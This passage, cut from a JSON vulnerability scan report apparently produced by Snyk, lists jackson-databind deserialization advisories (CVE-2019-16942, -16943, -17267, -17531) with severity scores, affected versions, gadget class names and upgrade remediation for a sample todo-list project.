Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T14:43:42.115110Z", - "functions_new": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - 
"functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-16T14:37:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T14:37:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:32.899468Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": 
"https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:50.462784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. 
An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16942" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx7p-6679-8g3q" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:02:18.178548Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": 
"CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.988000Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": 
"2024-03-11T09:52:13.709990Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.814203Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16943" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-fmmc-742q-jg75" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:03:39.391997Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - 
"severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.024581Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2460", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:04.701685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:59.172828Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.064844Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", - "epssDetails": { - "percentile": "0.85119", - "probability": "0.01174", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17267" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-f3j5-rmmp-3fc5" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-07T10:05:31.629572Z", - "functions_new": [ - { - "version": [ - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-07T01:14:26Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-07T01:14:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.064844Z", - 
"socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Zhangxianhui" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Blog Post" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2498", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": 
"2024-03-11T09:53:53.918541Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:58.282653Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.712421Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.918541Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", - "epssDetails": { - "percentile": "0.80301", - "probability": "0.00690", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-17531" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-gjmw-vf9h-g25v" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-13T07:40:03.046000Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-12T21:52:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
